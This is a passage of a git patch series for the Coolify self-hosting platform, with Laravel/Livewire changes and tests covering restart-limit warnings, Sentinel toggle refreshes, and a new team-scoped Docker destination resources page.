+use App\Notifications\Application\RestartLimitReached;
+
+function applicationWithRestartState(array $attributes = []): Application
+{
+    $application = new Application;
+    $application->forceFill(array_merge([
+        'status' => 'exited:unhealthy',
+        'restart_count' => 2,
+        'max_restart_count' => 2,
+        'last_restart_type' => 'crash',
+        'last_restart_at' => now(),
+    ], $attributes));
+
+    return $application;
+}
+
+it('detects applications stopped after reaching the crash restart limit', function () {
+    expect(applicationWithRestartState()->stoppedAfterRestartLimit())->toBeTrue()
+        ->and(applicationWithRestartState(['status' => 'running:unhealthy'])->stoppedAfterRestartLimit())->toBeFalse()
+        ->and(applicationWithRestartState(['restart_count' => 1])->stoppedAfterRestartLimit())->toBeFalse()
+        ->and(applicationWithRestartState(['max_restart_count' => 0])->stoppedAfterRestartLimit())->toBeFalse()
+        ->and(applicationWithRestartState(['last_restart_type' => null])->stoppedAfterRestartLimit())->toBeFalse();
+});
+
+it('shows a stopped after restart limit warning in the status badge', function () {
+    $html = view('components.status.index', [
+        'resource' => applicationWithRestartState(),
+        'showRefreshButton' => false,
+    ])->render();
+
+    expect($html)->toContain('Stopped after reaching restart limit (2/2).')
+        ->and($html)->toContain('Container has crashed and Coolify stopped it after 2 restart attempts.');
+});
+
+it('does not show the restart limit warning for a normal manual stop', function () {
+    $html = view('components.status.index', [
+        'resource' => applicationWithRestartState([
+            'restart_count' => 0,
+            'last_restart_type' => null,
+        ]),
+        'showRefreshButton' => false,
+    ])->render();
+
+    expect($html)->not->toContain('Stopped after reaching restart limit');
+});
+
+it('keeps restart tracking configurable when stopping an application', function () {
+    $method = new ReflectionMethod(StopApplication::class, 'handle');
+    $resetRestartCount = collect($method->getParameters())->firstWhere('name', 'resetRestartCount');
+
+    expect($resetRestartCount)->not->toBeNull()
+        ->and($resetRestartCount->getDefaultValue())->toBeTrue();
+});
+
+it('uses the application link for restart limit notifications', function () {
+    $application = new class extends Application
+    {
+        public function link()
+        {
+            return 'https://coolify.test/project/link-from-model';
+        }
+    };
+    $application->forceFill([
+        'name' => 'crashy-app',
+        'uuid' => 'application-uuid',
+        'restart_count' => 2,
+        'max_restart_count' => 2,
+    ]);
+    $application->setRelation('environment', (object) [
+        'uuid' => 'environment-uuid',
+        'name' => 'production',
+        'project' => (object) ['uuid' => 'project-uuid'],
+    ]);
+
+    $notification = new RestartLimitReached($application);
+
+    expect($notification->resource_url)->toBe('https://coolify.test/project/link-from-model');
+});

From d892d0ad10c6df4873c55c7d88cbe4df637b7e72 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 3 Jun 2026 11:10:13 +0200
Subject: [PATCH 89/90] fix(sentinel): refresh server nav after toggles

Dispatch server show refreshes after Sentinel and metrics toggles, preserve editable Sentinel form fields during restart events, and gate custom image editing by update permission.
---
 app/Livewire/Server/Charts.php                |  8 ++++---
 app/Livewire/Server/Sentinel.php              |  5 +++--
 app/Livewire/Server/Sentinel/Logs.php         | 14 ++++++-------
 app/Livewire/Server/Sentinel/Show.php         |  9 ++++----
 .../server/sidebar-sentinel.blade.php         |  2 +-
 .../views/livewire/server/sentinel.blade.php  |  3 ++-
 .../Livewire/SentinelComponentTest.php        | 21 +++++++++++++++++++
 7 files changed, 43 insertions(+), 19 deletions(-)
 create mode 100644 tests/Feature/Livewire/SentinelComponentTest.php

diff --git a/app/Livewire/Server/Charts.php b/app/Livewire/Server/Charts.php
index 7c555959f..1cda771a7 100644
--- a/app/Livewire/Server/Charts.php
+++ b/app/Livewire/Server/Charts.php
@@ -32,7 +32,7 @@ public function mount(string $server_uuid)
         }
     }
 
-    public function toggleMetrics()
+    public function toggleMetrics(): void
     {
         try {
             $this->authorize('update', $this->server);
@@ -42,14 +42,16 @@ public function toggleMetrics()
 
             if ($this->server->isMetricsEnabled()) {
                 StartSentinel::run($this->server, true);
-                $this->dispatch('success', 'Metrics enabled. Restarting Sentinel.');
+                $this->dispatch('success', 'Metrics enabled. Starting Sentinel.');
+                $this->dispatch('refreshServerShow');
                 $this->redirect(route('server.metrics', ['server_uuid' => $this->server->uuid]), navigate: true);
             } else {
                 $this->server->restartSentinel();
                 $this->dispatch('success', 'Metrics disabled. Restarting Sentinel.');
+                $this->dispatch('refreshServerShow');
             }
         } catch (\Throwable $e) {
-            return handleError($e, $this);
+            handleError($e, $this);
         }
     }
 
diff --git a/app/Livewire/Server/Sentinel.php b/app/Livewire/Server/Sentinel.php
index 73889378a..909ed54f9 100644
--- a/app/Livewire/Server/Sentinel.php
+++ b/app/Livewire/Server/Sentinel.php
@@ -104,7 +104,7 @@ public function restartSentinel()
         }
     }
 
-    public function toggleSentinel()
+    public function toggleSentinel(): void
     {
         try {
             $this->authorize('manageSentinel', $this->server);
@@ -124,8 +124,9 @@ public function toggleSentinel()
                 StopSentinel::dispatch($this->server);
             }
             $this->submit();
+            $this->dispatch('refreshServerShow');
         } catch (\Throwable $e) {
-            return handleError($e, $this);
+            handleError($e, $this);
         }
     }
 
diff --git a/app/Livewire/Server/Sentinel/Logs.php b/app/Livewire/Server/Sentinel/Logs.php
index 513776a6f..6619e101e 100644
--- a/app/Livewire/Server/Sentinel/Logs.php
+++ b/app/Livewire/Server/Sentinel/Logs.php
@@ -3,28 +3,26 @@
 namespace App\Livewire\Server\Sentinel;
 
 use App\Models\Server;
+use Illuminate\View\View;
 use Livewire\Component;
 
 class Logs extends Component
 {
     public ?Server $server = null;
 
-    public $parameters = [];
+    public array $parameters = [];
 
-    public function mount()
+    public function mount(): void
     {
         $this->parameters = get_route_parameters();
         try {
-            $this->server = Server::ownedByCurrentTeam()->whereUuid(request()->server_uuid)->first();
-            if (is_null($this->server)) {
-                return redirect()->route('server.index');
-            }
+            $this->server = Server::ownedByCurrentTeam()->whereUuid(request()->server_uuid)->firstOrFail();
         } catch (\Throwable $e) {
-            return handleError($e, $this);
+            handleError($e, $this);
         }
     }
 
-    public function render()
+    public function render(): View
     {
         return view('livewire.server.sentinel.logs');
     }
diff --git a/app/Livewire/Server/Sentinel/Show.php b/app/Livewire/Server/Sentinel/Show.php
index 4bfc4c398..7070a09ce 100644
--- a/app/Livewire/Server/Sentinel/Show.php
+++ b/app/Livewire/Server/Sentinel/Show.php
@@ -3,25 +3,26 @@
 namespace App\Livewire\Server\Sentinel;
 
 use App\Models\Server;
+use Illuminate\View\View;
 use Livewire\Component;
 
 class Show extends Component
 {
     public ?Server $server = null;
 
-    public $parameters = [];
+    public array $parameters = [];
 
-    public function mount()
+    public function mount(): void
     {
         $this->parameters = get_route_parameters();
         try {
             $this->server = Server::ownedByCurrentTeam()->whereUuid(request()->server_uuid)->firstOrFail();
         } catch (\Throwable $e) {
-            return handleError($e, $this);
+            handleError($e, $this);
         }
     }
 
-    public function render()
+    public function render(): View
     {
         return view('livewire.server.sentinel.show');
     }
diff --git a/resources/views/components/server/sidebar-sentinel.blade.php b/resources/views/components/server/sidebar-sentinel.blade.php
index 8249c9413..8125fe22c 100644
--- a/resources/views/components/server/sidebar-sentinel.blade.php
+++ b/resources/views/components/server/sidebar-sentinel.blade.php
@@ -3,7 +3,7 @@
         href="{{ route('server.sentinel', $parameters) }}">
         <span class="menu-item-label">Configuration</span>
     </a>
-    <a class="{{ request()->routeIs('server.sentinel.logs') ? 'sub-menu-item menu-item-active' : 'sub-menu-item' }}"
+    <a class="{{ request()->routeIs('server.sentinel.logs') ? 'sub-menu-item menu-item-active' : 'sub-menu-item' }}" {{ wireNavigate() }}
         href="{{ route('server.sentinel.logs', $parameters) }}">
         <span class="menu-item-label">Logs</span>
     </a>
diff --git a/resources/views/livewire/server/sentinel.blade.php b/resources/views/livewire/server/sentinel.blade.php
index bbe0b7037..9ba361662 100644
--- a/resources/views/livewire/server/sentinel.blade.php
+++ b/resources/views/livewire/server/sentinel.blade.php
@@ -35,7 +35,8 @@
                         $wire.set('sentinelCustomDockerImage', this.customImage);
                     }
                 }" x-init="$wire.set('sentinelCustomDockerImage', customImage)">
-                    <x-forms.input x-model="customImage" @input.debounce.500ms="saveCustomImage()"
+                    <x-forms.input canGate="update" :canResource="$server" x-model="customImage"
+                        @input.debounce.500ms="saveCustomImage()"
                         placeholder="e.g., sentinel:latest or myregistry/sentinel:dev"
                         label="Custom Sentinel Docker Image (Dev Only)"
                         helper="Override the default Sentinel Docker image for testing. Leave empty to use the default." />
diff --git a/tests/Feature/Livewire/SentinelComponentTest.php b/tests/Feature/Livewire/SentinelComponentTest.php
new file mode 100644
index 000000000..47cad4e22
--- /dev/null
+++ b/tests/Feature/Livewire/SentinelComponentTest.php
@@ -0,0 +1,21 @@
+<?php
+
+it('keeps sentinel restarted events from re-syncing editable form fields', function () {
+    $componentSource = file_get_contents(app_path('Livewire/Server/Sentinel.php'));
+
+    preg_match('/public function handleSentinelRestarted\([^)]*\)\s*\{(?<body>.*?)\n    \}/s', $componentSource, $matches);
+
+    expect($matches['body'] ?? '')
+        ->toContain('$this->sentinelUpdatedAt = $this->server->sentinel_updated_at;')
+        ->not->toContain('$this->syncData();');
+});
+
+it('dispatches a server navbar refresh after toggling sentinel', function () {
+    $componentSource = file_get_contents(app_path('Livewire/Server/Sentinel.php'));
+
+    preg_match('/public function toggleSentinel\([^)]*\).*?\{(?<body>.*?)
+    \}/s', $componentSource, $matches);
+
+    expect($matches['body'] ?? '')
+        ->toContain("\$this->dispatch('refreshServerShow');");
+});

From 13e94a499d9c5d88834e9ad59fb2e566e369ad02 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 3 Jun 2026 11:24:36 +0200
Subject: [PATCH 90/90] feat(destinations): split Docker resources into
 separate page

Move standalone Docker destination resource listings out of the general
settings view and add a searchable resources page with team-scoped tests.
---
 app/Livewire/Destination/Resources.php        | 125 ++++++++++++++++++
 app/Livewire/Destination/Show.php             |  62 ---------
 app/Models/StandaloneDocker.php               |   3 +-
 .../livewire/destination/navbar.blade.php     |  14 ++
 .../livewire/destination/resources.blade.php  |  53 ++++++++
 .../views/livewire/destination/show.blade.php |  24 +---
 routes/web.php                                |   2 +
 tests/Feature/TeamScopedDestinationTest.php   |  77 +++++++++++
 8 files changed, 276 insertions(+), 84 deletions(-)
 create mode 100644 app/Livewire/Destination/Resources.php
 create mode 100644 resources/views/livewire/destination/navbar.blade.php
 create mode 100644 resources/views/livewire/destination/resources.blade.php

diff --git a/app/Livewire/Destination/Resources.php b/app/Livewire/Destination/Resources.php
new file mode 100644
index 000000000..c71010411
--- /dev/null
+++ b/app/Livewire/Destination/Resources.php
@@ -0,0 +1,125 @@
+<?php
+
+namespace App\Livewire\Destination;
+
+use App\Models\Application;
+use App\Models\BaseModel;
+use App\Models\Service;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDocker;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use Illuminate\Contracts\View\View;
+use Livewire\Attributes\Locked;
+use Livewire\Component;
+
+class Resources extends Component
+{
+    #[Locked]
+    public $destination;
+
+    public array $resources = [];
+
+    public function mount(string $destination_uuid)
+    {
+        try {
+            $destination = find_destination_for_current_team($destination_uuid);
+            if (! $destination) {
+                return redirect()->route('destination.index');
+            }
+            if (! $destination instanceof StandaloneDocker) {
+                return redirect()->route('destination.show', ['destination_uuid' => $destination->uuid]);
+            }
+
+            $this->destination = $destination;
+            $this->loadResources();
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
+    }
+
+    /**
+     * Load applications, services, and database resources deployed to the standalone Docker destination.
+     *
+     * @return void Populates the resources property for display.
+     */
+    public function loadResources(): void
+    {
+        $this->resources = $this->collectResources([
+            $this->destination->applications,
+            $this->destination->services,
+            $this->destination->postgresqls,
+            $this->destination->redis,
+            $this->destination->mongodbs,
+            $this->destination->mysqls,
+            $this->destination->mariadbs,
+            $this->destination->keydbs,
+            $this->destination->dragonflies,
+            $this->destination->clickhouses,
+        ]);
+    }
+
+    /**
+     * @param  array<int, iterable<Application|Service|StandalonePostgresql|StandaloneRedis|StandaloneMongodb|StandaloneMysql|StandaloneMariadb|StandaloneKeydb|StandaloneDragonfly|StandaloneClickhouse>>  $groups
+     * @return array<int, array{uuid:string,type:string,name:string,project:string|null,environment:string|null,url:string|null,search:string}>
+     */
+    protected function collectResources(array $groups): array
+    {
+        $rows = [];
+        foreach ($groups as $group) {
+            foreach ($group as $resource) {
+                $rows[] = $this->resourceRow($resource);
+            }
+        }
+
+        return $rows;
+    }
+
+    /**
+     * @param  Application|Service|StandalonePostgresql|StandaloneRedis|StandaloneMongodb|StandaloneMysql|StandaloneMariadb|StandaloneKeydb|StandaloneDragonfly|StandaloneClickhouse  $resource
+     * @return array{uuid:string,type:string,name:string,project:string|null,environment:string|null,url:string|null,search:string}
+     */
+    protected function resourceRow(BaseModel $resource): array
+    {
+        $type = match (true) {
+            $resource instanceof Application => 'application',
+            $resource instanceof Service => 'service',
+            default => 'database',
+        };
+        $environment = $resource->environment;
+        $project = $environment?->project;
+        $routeName = "project.{$type}.configuration";
+        $url = ($project && $environment)
+            ? route($routeName, [
+                'project_uuid' => $project->uuid,
+                'environment_uuid' => $environment->uuid,
+                "{$type}_uuid" => $resource->uuid,
+            ])
+            : null;
+
+        return [
+            'uuid' => $resource->uuid,
+            'type' => $type,
+            'name' => $resource->name,
+            'project' => $project?->name,
+            'environment' => $environment?->name,
+            'url' => $url,
+            'search' => strtolower(implode(' ', array_filter([
+                $type,
+                $resource->name,
+                $project?->name,
+                $environment?->name,
+            ]))),
+        ];
+    }
+
+    public function render(): View
+    {
+        return view('livewire.destination.resources');
+    }
+}
diff --git a/app/Livewire/Destination/Show.php b/app/Livewire/Destination/Show.php
index 11afbbccc..9d55d7462 100644
--- a/app/Livewire/Destination/Show.php
+++ b/app/Livewire/Destination/Show.php
@@ -24,8 +24,6 @@ class Show extends Component
     #[Validate(['string', 'required'])]
     public string $serverIp;
 
-    public array $resources = [];
-
     public function mount(string $destination_uuid)
     {
         try {
@@ -35,71 +33,11 @@ public function mount(string $destination_uuid)
             }
             $this->destination = $destination;
             $this->syncData();
-            $this->loadResources();
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }
     }
 
-    public function loadResources(): void
-    {
-        if ($this->destination->getMorphClass() !== \App\Models\StandaloneDocker::class) {
-            return;
-        }
-
-        $this->resources = $this->collectResources([
-            $this->destination->applications,
-            $this->destination->services,
-            $this->destination->postgresqls,
-            $this->destination->redis,
-            $this->destination->mongodbs,
-            $this->destination->mysqls,
-            $this->destination->mariadbs,
-            $this->destination->keydbs,
-            $this->destination->dragonflies,
-            $this->destination->clickhouses,
-        ]);
-    }
-
-    protected function collectResources(array $groups): array
-    {
-        $rows = [];
-        foreach ($groups as $group) {
-            foreach ($group as $resource) {
-                $rows[] = $this->resourceRow($resource);
-            }
-        }
-
-        return $rows;
-    }
-
-    protected function resourceRow($resource): array
-    {
-        $type = match (true) {
-            $resource instanceof \App\Models\Application => 'application',
-            $resource instanceof \App\Models\Service => 'service',
-            default => 'database',
-        };
-        $environment = $resource->environment;
-        $project = $environment?->project;
-        $routeName = "project.{$type}.configuration";
-        $url = ($project && $environment)
-            ? route($routeName, [
-                'project_uuid' => $project->uuid,
-                'environment_uuid' => $environment->uuid,
-                "{$type}_uuid" => $resource->uuid,
-            ])
-            : null;
-
-        return [
-            'type' => $type,
-            'name' => $resource->name,
-            'project' => $project?->name,
-            'environment' => $environment?->name,
-            'url' => $url,
-        ];
-    }
-
     public function syncData(bool $toModel = false)
     {
         if ($toModel) {
diff --git a/app/Models/StandaloneDocker.php b/app/Models/StandaloneDocker.php
index d12a15a7c..1c5cfd342 100644
--- a/app/Models/StandaloneDocker.php
+++ b/app/Models/StandaloneDocker.php
@@ -5,6 +5,7 @@
 use App\Jobs\ConnectProxyToNetworksJob;
 use App\Support\ValidationPatterns;
 use App\Traits\HasSafeStringAttribute;
+use Illuminate\Database\Eloquent\Collection;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
 
 class StandaloneDocker extends BaseModel
@@ -127,7 +128,7 @@ public function services()
         return $this->morphMany(Service::class, 'destination');
     }
 
-    public function databases()
+    public function databases(): Collection
     {
         $postgresqls = $this->postgresqls;
         $redis = $this->redis;
diff --git a/resources/views/livewire/destination/navbar.blade.php b/resources/views/livewire/destination/navbar.blade.php
new file mode 100644
index 000000000..4585e57a9
--- /dev/null
+++ b/resources/views/livewire/destination/navbar.blade.php
@@ -0,0 +1,14 @@
+@if ($destination->getMorphClass() === 'App\\Models\\StandaloneDocker')
+    <div class="navbar-main">
+        <nav class="flex shrink-0 gap-6 items-center whitespace-nowrap scrollbar min-h-10">
+            <a class="{{ request()->routeIs('destination.show') ? 'dark:text-white' : '' }}" {{ wireNavigate() }}
+                href="{{ route('destination.show', ['destination_uuid' => $destination->uuid]) }}">
+                General
+            </a>
+            <a class="{{ request()->routeIs('destination.resources') ? 'dark:text-white' : '' }}" {{ wireNavigate() }}
+                href="{{ route('destination.resources', ['destination_uuid' => $destination->uuid]) }}">
+                Resources
+            </a>
+        </nav>
+    </div>
+@endif
diff --git a/resources/views/livewire/destination/resources.blade.php b/resources/views/livewire/destination/resources.blade.php
new file mode 100644
index 000000000..8883cc021
--- /dev/null
+++ b/resources/views/livewire/destination/resources.blade.php
@@ -0,0 +1,53 @@
+<div>
+    <div class="flex items-center gap-2">
+        <h1>Destination</h1>
+    </div>
+    <div class="subtitle">Resources deployed to this Docker network.</div>
+
+    @include('livewire.destination.navbar', ['destination' => $destination])
+
+    <div class="pt-4" x-data="{ search: '' }">
+        @if (count($resources) === 0)
+            <div class="py-4 text-sm opacity-70">No resources are using this destination.</div>
+        @else
+            <x-forms.input placeholder="Search resources..." x-model="search" id="null" />
+            <div class="overflow-x-auto pt-4">
+                <div class="inline-block min-w-full">
+                    <div class="overflow-hidden">
+                        <table class="min-w-full">
+                            <thead>
+                                <tr>
+                                    <th class="px-5 py-3 text-xs font-medium text-left uppercase">Project</th>
+                                    <th class="px-5 py-3 text-xs font-medium text-left uppercase">Environment</th>
+                                    <th class="px-5 py-3 text-xs font-medium text-left uppercase">Name</th>
+                                    <th class="px-5 py-3 text-xs font-medium text-left uppercase">Type</th>
+                                </tr>
+                            </thead>
+                            <tbody class="divide-y">
+                                @foreach ($resources as $row)
+                                    <tr class="dark:hover:bg-coolgray-300 hover:bg-neutral-100"
+                                        wire:key="destination-resource-{{ $row['type'] }}-{{ $row['uuid'] }}"
+                                        x-show="search === '' || '{{ addslashes($row['search']) }}'.includes(search.toLowerCase())">
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">{{ $row['project'] }}</td>
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">{{ $row['environment'] }}</td>
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">
+                                            @if ($row['url'])
+                                                <a {{ wireNavigate() }} href="{{ $row['url'] }}">
+                                                    {{ $row['name'] }}
+                                                    <x-internal-link />
+                                                </a>
+                                            @else
+                                                <span>{{ $row['name'] }}</span>
+                                            @endif
+                                        </td>
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">{{ ucfirst($row['type']) }}</td>
+                                    </tr>
+                                @endforeach
+                            </tbody>
+                        </table>
+                    </div>
+                </div>
+            </div>
+        @endif
+    </div>
+</div>
diff --git a/resources/views/livewire/destination/show.blade.php b/resources/views/livewire/destination/show.blade.php
index 1bb179823..77b7209b7 100644
--- a/resources/views/livewire/destination/show.blade.php
+++ b/resources/views/livewire/destination/show.blade.php
@@ -20,7 +20,9 @@
                 <x-deprecated-badge />
             </div>
         @endif
-        <div class="flex gap-2">
+        @include('livewire.destination.navbar', ['destination' => $destination])
+
+        <div class="flex gap-2 pt-4">
             <x-forms.input canGate="update" :canResource="$destination" id="name" label="Name" />
             <x-forms.input id="serverIp" label="Server IP" readonly />
             @if ($destination->getMorphClass() === 'App\Models\StandaloneDocker')
@@ -28,24 +30,4 @@
             @endif
         </div>
     </form>
-
-    @if ($destination->getMorphClass() === 'App\Models\StandaloneDocker')
-        <div class="pt-6">
-            <h3>Resources</h3>
-            <div class="pb-2 text-xs opacity-70">Applications, services, and databases deployed to this network.</div>
-            @if (count($resources) === 0)
-                <div class="text-xs opacity-70 pt-2">No resources are using this destination.</div>
-            @else
-                <div class="grid grid-cols-1 md:grid-cols-2 gap-2 pt-2">
-                    @foreach ($resources as $row)
-                        <a href="{{ $row['url'] }}"
-                            class="relative flex flex-col dark:text-white coolbox group cursor-pointer">
-                            <div class="box-title">{{ ucfirst($row['type']) }}: {{ $row['name'] }}</div>
-                            <div class="box-description">{{ $row['project'] }} / {{ $row['environment'] }}</div>
-                        </a>
-                    @endforeach
-                </div>
-            @endif
-        </div>
-    @endif
 </div>
diff --git a/routes/web.php b/routes/web.php
index 3dab7b4fe..f77277699 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -7,6 +7,7 @@
 use App\Livewire\Boarding\Index as BoardingIndex;
 use App\Livewire\Dashboard;
 use App\Livewire\Destination\Index as DestinationIndex;
+use App\Livewire\Destination\Resources as DestinationResources;
 use App\Livewire\Destination\Show as DestinationShow;
 use App\Livewire\ForcePasswordReset;
 use App\Livewire\Notifications\Discord as NotificationDiscord;
@@ -304,6 +305,7 @@
     });
     Route::get('/destinations', DestinationIndex::class)->name('destination.index');
     Route::get('/destination/{destination_uuid}', DestinationShow::class)->name('destination.show');
+    Route::get('/destination/{destination_uuid}/resources', DestinationResources::class)->name('destination.resources');
 
     // Route::get('/security', fn () => view('security.index'))->name('security.index');
     Route::get('/security/private-key', SecurityPrivateKeyIndex::class)->name('security.private-key.index');
diff --git a/tests/Feature/TeamScopedDestinationTest.php b/tests/Feature/TeamScopedDestinationTest.php
index bdac0251d..943676ba4 100644
--- a/tests/Feature/TeamScopedDestinationTest.php
+++ b/tests/Feature/TeamScopedDestinationTest.php
@@ -1,5 +1,6 @@
 <?php
 
+use App\Livewire\Destination\Resources as DestinationResources;
 use App\Livewire\Destination\Show as DestinationShow;
 use App\Livewire\Project\New\DockerCompose;
 use App\Livewire\Project\New\DockerImage;
@@ -294,4 +295,80 @@
         expect($component->get('destination'))->toBeNull();
         $component->assertRedirect(route('destination.index'));
     });
+
+    test('general page links to separate resources page without rendering the resources table', function () {
+        Livewire::test(DestinationShow::class, ['destination_uuid' => $this->destinationA->uuid])
+            ->assertSee('General')
+            ->assertSee('Resources')
+            ->assertDontSee('Search resources...')
+            ->assertDontSee('No resources are using this destination.');
+    });
+
+    test('mount with own standalone destination lists deployed resources', function () {
+        Application::factory()->create([
+            'name' => 'application-on-destination',
+            'environment_id' => $this->environmentA->id,
+            'destination_id' => $this->destinationA->id,
+            'destination_type' => StandaloneDocker::class,
+        ]);
+        Service::factory()->create([
+            'name' => 'service-on-destination',
+            'environment_id' => $this->environmentA->id,
+            'destination_id' => $this->destinationA->id,
+            'destination_type' => StandaloneDocker::class,
+        ]);
+        StandalonePostgresql::withoutEvents(fn () => StandalonePostgresql::create([
+            'uuid' => fake()->uuid(),
+            'name' => 'database-on-destination',
+            'postgres_password' => 'password',
+            'environment_id' => $this->environmentA->id,
+            'destination_id' => $this->destinationA->id,
+            'destination_type' => StandaloneDocker::class,
+        ]));
+
+        Livewire::test(DestinationResources::class, ['destination_uuid' => $this->destinationA->uuid])
+            ->assertSee('Search resources...')
+            ->assertSee('Project')
+            ->assertSee('Environment')
+            ->assertSee('Name')
+            ->assertSee('Type')
+            ->assertSee('application-on-destination')
+            ->assertSee('service-on-destination')
+            ->assertSee('database-on-destination')
+            ->assertSee($this->projectA->name)
+            ->assertSee($this->environmentA->name);
+    });
+
+    test('mount with own standalone destination shows empty state without resources', function () {
+        Livewire::test(DestinationResources::class, ['destination_uuid' => $this->destinationA->uuid])
+            ->assertSee('No resources are using this destination.');
+    });
+
+    test('mount with own standalone destination does not list another team resources', function () {
+        Application::factory()->create([
+            'name' => 'other-team-application',
+            'environment_id' => $this->environmentB->id,
+            'destination_id' => $this->destinationB->id,
+            'destination_type' => StandaloneDocker::class,
+        ]);
+
+        Livewire::test(DestinationResources::class, ['destination_uuid' => $this->destinationA->uuid])
+            ->assertDontSee('other-team-application');
+    });
+
+    test('resource without project renders as non-clickable row', function () {
+        StandalonePostgresql::withoutEvents(fn () => StandalonePostgresql::create([
+            'uuid' => fake()->uuid(),
+            'name' => 'database-without-project',
+            'postgres_password' => 'password',
+            'environment_id' => null,
+            'destination_id' => $this->destinationA->id,
+            'destination_type' => StandaloneDocker::class,
+        ]));
+
+        $component = Livewire::test(DestinationResources::class, ['destination_uuid' => $this->destinationA->uuid])
+            ->assertSee('database-without-project');
+
+        expect($component->html())->not->toContain('href=""');
+    });
 });